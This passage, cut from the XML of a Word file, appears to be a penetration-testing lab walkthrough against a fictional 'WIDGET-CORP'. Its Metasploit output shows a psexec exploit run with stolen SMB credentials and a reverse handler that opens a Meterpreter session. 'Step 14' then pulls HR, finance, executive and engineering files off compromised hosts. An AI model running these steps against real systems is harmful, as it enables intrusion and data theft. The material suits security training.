          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>) &gt; set RHOST 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E2440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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>RHOST =&gt; 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D194D3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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>) &gt; set SMBUSER eviluser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4739DE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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>SMBUSER =&gt; eviluser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83E3F9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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>) &gt; set SMBPASS EvilPass1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD97A1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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>SMBPASS =&gt; EvilPass1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06355943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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>) &gt; set SMBDOMAIN WIDGET-CORP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE1BA8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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>SMBDOMAIN =&gt; WIDGET-CORP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67DE55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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C96F13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</w:p>
    <w:p w14:paraId="0EB6D9B0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7C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Started reverse handler on 172.17.17.116:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9E7BE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7C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Connecting to the server...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC1D58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7C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authenticating to 10.10.93.15:445|WIDGET-CORP as user 'eviluser'...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E9116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7C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uploading payload...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460C3D8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7C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Created \QXMEVkbi.exe...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4620EB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7C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sending stage (885806 bytes) to 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00699D22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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2FB41D"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.93.15:445 - Service started successfully...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBDD8F2" w14:textId="77777777" w:rsidR="007C13DF" w:rsidRPr="007C13DF" w:rsidRDefault="007C13DF" w:rsidP="007C13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7C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deleting \QXMEVkbi.exe...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F836A6" w14:textId="0438B394" w:rsidR="007C13DF" w:rsidRPr="007C13DF" w:rsidRDefault="007C13DF" w:rsidP="007C13DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C13D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter session 2 opened (172.17.17.116:4444 -&gt; 10.10.93.15:52525) at 2016-03-09 22:47:46 -0500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427C106" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72"/>
    <w:p w14:paraId="0E4DF9C7" w14:textId="77777777" w:rsidR="007C13DF" w:rsidRDefault="007C13DF"/>
    <w:p w14:paraId="0C191EC3" w14:textId="5E1475F8" w:rsidR="006B5710" w:rsidRDefault="007C13DF" w:rsidP="007C13DF">
      <w:r>
        <w:t>Step 14. Now that we can move in the network and have multiple sessions in background we can download files from the various machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABDE725" w14:textId="77777777" w:rsidR="006B5710" w:rsidRDefault="006B5710"/>
    <w:p w14:paraId="51FE8442" w14:textId="17A6A683" w:rsidR="007C13DF" w:rsidRDefault="007C13DF">
      <w:r>
        <w:t>Shared Files from smb-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52078279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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>meterpreter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&gt; download C:\\filestore\\HR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0525350D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C:\filestore\HR\Aniversary Party Flier v1.png -&gt; HR/Aniversary Party Flier v1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F70E612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C:\filestore\HR\Aniversary Party Flier v1.png -&gt; HR/Aniversary Party Flier v1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29374324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C:\filestore\HR\Aniversary Party Flier v2.png -&gt; HR/Aniversary Party Flier v2.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481786A2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C:\filestore\HR\Aniversary Party Flier v2.png -&gt; HR/Aniversary Party Flier v2.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994C46D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C:\filestore\HR\College internship program.png -&gt; HR/College internship program.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B405FB0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C:\filestore\HR\College internship program.png -&gt; HR/College internship program.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3D7D4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C:\filestore\HR\Company retreat flier v1.png -&gt; HR/Company retreat flier v1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9BA147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C:\filestore\HR\Company retreat flier v1.png -&gt; HR/Company retreat flier v1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8702A6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C:\filestore\HR\Company retreat flier v2.png -&gt; HR/Company retreat flier v2.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D7CD5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C:\filestore\HR\Company retreat flier v2.png -&gt; HR/Company retreat flier v2.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AF21C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C:\filestore\HR\Human Resources Strategy.png -&gt; HR/Human Resources Strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31970A65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C:\filestore\HR\Human Resources Strategy.png -&gt; HR/Human Resources Strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A767F97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C:\filestore\HR\Telework Strategy.png -&gt; HR/Telework Strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F096E7C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C:\filestore\HR\Telework Strategy.png -&gt; HR/Telework Strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E098D0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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>meterpreter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&gt; download C:\\filestore\\finance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E533083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C:\filestore\finance\IRS Audit Defense Plan.png -&gt; finance/IRS Audit Defense Plan.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08790056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C:\filestore\finance\IRS Audit Defense Plan.png -&gt; finance/IRS Audit Defense Plan.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250EA8B4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C:\filestore\finance\Widget Corp IPO Documentation.png -&gt; finance/Widget Corp IPO Documentation.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AC37A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C:\filestore\finance\Widget Corp IPO Documentation.png -&gt; finance/Widget Corp IPO Documentation.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA011B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C:\filestore\finance\Widget Corp IPO initial price projection.png -&gt; finance/Widget Corp IPO initial price projection.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66691DDB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C:\filestore\finance\Widget Corp IPO initial price projection.png -&gt; finance/Widget Corp IPO initial price projection.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB4B79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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>meterpreter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&gt; download C:\\filestore\\Marketing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B56E4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C:\filestore\Marketing\Corporate Profile - CIO.png -&gt; Marketing/Corporate Profile - CIO.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C16548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C:\filestore\Marketing\Corporate Profile - CIO.png -&gt; Marketing/Corporate Profile - CIO.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1757701F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C:\filestore\Marketing\Corporate Profile - CTO.png -&gt; Marketing/Corporate Profile - CTO.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10751D92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C:\filestore\Marketing\Corporate Profile - CTO.png -&gt; Marketing/Corporate Profile - CTO.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FC2860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C:\filestore\Marketing\Corporate Profile - President.png -&gt; Marketing/Corporate Profile - President.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA5EFE0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C:\filestore\Marketing\Corporate Profile - President.png -&gt; Marketing/Corporate Profile - President.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF027BC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C:\filestore\Marketing\Corporate Profile - Widgeteer.png -&gt; Marketing/Corporate Profile - Widgeteer.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07313C74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C:\filestore\Marketing\Corporate Profile - Widgeteer.png -&gt; Marketing/Corporate Profile - Widgeteer.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8E9DD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C:\filestore\Marketing\Employee of the Month award winner.png -&gt; Marketing/Employee of the Month award winner.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30606DD9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C:\filestore\Marketing\Employee of the Month award winner.png -&gt; Marketing/Employee of the Month award winner.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62D7E6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C:\filestore\Marketing\Future promotional materials.png -&gt; Marketing/Future promotional materials.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310189FE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C:\filestore\Marketing\Future promotional materials.png -&gt; Marketing/Future promotional materials.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23179D6E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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>meterpreter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&gt; download C:\\filestore\\development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF5BBA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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>meterpreter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&gt; download "C:\\filestore\\Executive Planning"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6ED572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C:\filestore\Executive Planning\(sensitive) Project overview and milestones.png -&gt; Executive Planning/(sensitive) Project overview and milestones.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF5F51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C:\filestore\Executive Planning\(sensitive) Project overview and milestones.png -&gt; Executive Planning/(sensitive) Project overview and milestones.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8654A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C:\filestore\Executive Planning\Competitive synergistic consolidation strategy.png -&gt; Executive Planning/Competitive synergistic consolidation strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352B0EE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C:\filestore\Executive Planning\Competitive synergistic consolidation strategy.png -&gt; Executive Planning/Competitive synergistic consolidation strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A8D9F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C:\filestore\Executive Planning\Legacy business plan.png -&gt; Executive Planning/Legacy business plan.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF813F0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C:\filestore\Executive Planning\Legacy business plan.png -&gt; Executive Planning/Legacy business plan.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21855F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C:\filestore\Executive Planning\New facility physical plant security strategy.png -&gt; Executive Planning/New facility physical plant security strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23068DA4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C:\filestore\Executive Planning\New facility physical plant security strategy.png -&gt; Executive Planning/New facility physical plant security strategy.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D749748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C:\filestore\Executive Planning\Project plan for Q2 2015.png -&gt; Executive Planning/Project plan for Q2 2015.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC82AC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C:\filestore\Executive Planning\Project plan for Q2 2015.png -&gt; Executive Planning/Project plan for Q2 2015.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028DA7FA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C:\filestore\Executive Planning\Q4 marketing plan (kinda a big deal).png -&gt; Executive Planning/Q4 marketing plan (kinda a big deal).png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F71CABC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C:\filestore\Executive Planning\Q4 marketing plan (kinda a big deal).png -&gt; Executive Planning/Q4 marketing plan (kinda a big deal).png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B4885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C:\filestore\Executive Planning\Visit from the Bobs.png -&gt; Executive Planning/Visit from the Bobs.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6399E5F7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C:\filestore\Executive Planning\Visit from the Bobs.png -&gt; Executive Planning/Visit from the Bobs.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221811CB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C:\filestore\Executive Planning\WIDGET-CORP Strategic Plan.png -&gt; Executive Planning/WIDGET-CORP Strategic Plan.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F6327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C:\filestore\Executive Planning\WIDGET-CORP Strategic Plan.png -&gt; Executive Planning/WIDGET-CORP Strategic Plan.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B90CF" w14:textId="77777777" w:rsidR="006B5710" w:rsidRPr="006B5710" w:rsidRDefault="006B5710" w:rsidP="006B57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C:\filestore\Executive Planning\Widgets Online Activity House.png -&gt; Executive Planning/Widgets Online Activity House.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4128B848" w14:textId="342F0D2C" w:rsidR="00856141" w:rsidRPr="006B5710" w:rsidRDefault="006B5710" w:rsidP="006B5710">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5710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6B5710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C:\filestore\Executive Planning\Widgets Online Activity House.png -&gt; Executive Planning/Widgets Online Activity House.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F22D5" w14:textId="77777777" w:rsidR="00DB6760" w:rsidRDefault="00DB6760" w:rsidP="00CC2EE4"/>
    <w:p w14:paraId="3B68036C" w14:textId="77777777" w:rsidR="00DB6760" w:rsidRDefault="00DB6760" w:rsidP="00CC2EE4"/>
    <w:p w14:paraId="590A7913" w14:textId="0D1D12A0" w:rsidR="006B5710" w:rsidRDefault="007C13DF" w:rsidP="00CC2EE4">
      <w:r>
        <w:t>Files from Widgeteer box</w:t>
      </w:r>
      <w:r w:rsidR="00B1415F">
        <w:t xml:space="preserve"> 10</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FE8ED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B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; download "Corporate Profile - Widgeteer.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66177FF2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B1415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B1415F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Corporate Profile - Widgeteer.png -&gt; Corporate Profile - Widgeteer.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E945B6E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B1415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B1415F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Corporate Profile - Widgeteer.png -&gt; Corporate Profile - Widgeteer.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C844FC0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B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; download "Engineering Schematics (sensitive!)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4227C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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 1.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DBCF8F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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 1.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B652A1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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 2.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 2.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8CAE60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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 2.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 2.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460A6214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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 3.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 3.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176184DE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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 3.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 3.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332E5D5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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 4.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 4.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7E42A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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 4.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 4.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE8D32F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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 5.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 5.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA8732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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 5.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 5.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312149D4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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 6.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 6.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A1A7D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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 6.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 6.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35770A66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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 7.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 7.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6AE7E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B1415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B1415F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Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 7.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 7.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F0DD87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B1415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B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
